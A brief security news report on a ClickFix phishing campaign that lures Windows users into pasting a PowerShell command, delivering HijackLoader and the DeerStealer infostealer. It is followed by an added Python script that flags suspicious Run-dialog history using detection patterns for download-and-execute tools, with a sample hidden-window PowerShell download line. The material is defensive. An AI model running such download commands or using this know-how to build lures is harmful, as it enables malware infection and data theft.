Date: 2025-06-17

Malicious actors have exploited the ClickFix attack technique to facilitate the deployment of the HijackLoader and DeerStealer payloads as part of a new campaign, Infosecurity Magazine reports.
The intrusions redirected targets to a phishing page that lured them into running a PowerShell command in the Windows Run dialog. The command downloads an installer, which leverages a signed COMODO binary to load HijackLoader and DeerStealer, also known as XFiles Spyware, according to an analysis from eSentire's Threat Response Unit.

Aside from enabling data extraction from more than 50 web browsers and takeovers of over 14 types of cryptocurrency wallets, DeerStealer also exfiltrates data stored by messenger, FTP, VPN, email, and gaming clients. It maintains stealth via hidden VNC, modular obfuscation, encrypted HTTPS channels for command-and-control communications, and virtual machine-based string decryption, according to researchers.

With DeerStealer poised to include macOS support, expanded targeting, and artificial intelligence-based improvements, organizations have been urged to implement up-to-date endpoint protection and continuous threat monitoring.
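As a monitoring aid for the Run-dialog step described above, the following added example (not code from eSentire or Infosecurity Magazine) triages entries from the per-user Run history that Windows keeps under `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU`. The trait patterns, the threshold, and the sample values are assumptions constructed for illustration, not indicators from this campaign.

```python
import re

# Interpreters a Run-dialog entry rarely needs in normal use (assumed list).
INTERPRETERS = re.compile(r"\b(powershell|pwsh|mshta|cmd)(\.exe)?\b", re.I)

# Traits typical of a pasted download one-liner (assumed heuristics).
TRAITS = {
    "url": re.compile(r"https?://", re.I),
    "download": re.compile(
        r"\b(iwr|irm|curl|wget|invoke-webrequest|invoke-restmethod"
        r"|downloadstring|downloadfile)\b", re.I),
    "execute": re.compile(
        r"\b(iex|invoke-expression|start-process|msiexec)\b", re.I),
    "hidden_or_encoded": re.compile(
        r"(?<!\S)-(w|win|window|windowstyle|e|enc|encodedcommand)\b", re.I),
}

def score_run_entry(data):
    """Return the trait names matched by one RunMRU value."""
    # RunMRU stores each command with a trailing "\1"; strip it first.
    command = data[:-2] if data.endswith("\\1") else data
    if not INTERPRETERS.search(command):
        return []
    return [name for name, rx in TRAITS.items() if rx.search(command)]

def triage_runmru(values, threshold=2):
    """values: dict of RunMRU value name -> data. Returns flagged entries."""
    flagged = {}
    for name, data in values.items():
        if name == "MRUList":  # ordering string, not a command
            continue
        hits = score_run_entry(data)
        if len(hits) >= threshold:
            flagged[name] = hits
    return flagged

# Constructed sample of RunMRU values (not taken from the campaign).
SAMPLE = {
    "MRUList": "cba",
    "a": "cmd\\1",
    "b": "powershell -w hidden iwr https://example.invalid/setup.msi "
         "-OutFile s.msi\\1",
    "c": "\\\\fileserver\\share\\1",
}

if __name__ == "__main__":
    for name, hits in triage_runmru(SAMPLE).items():
        print(name, hits)
```

A flagged entry is a lead for review alongside endpoint telemetry, since RunMRU records only what was typed into the dialog and not whether the download succeeded.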
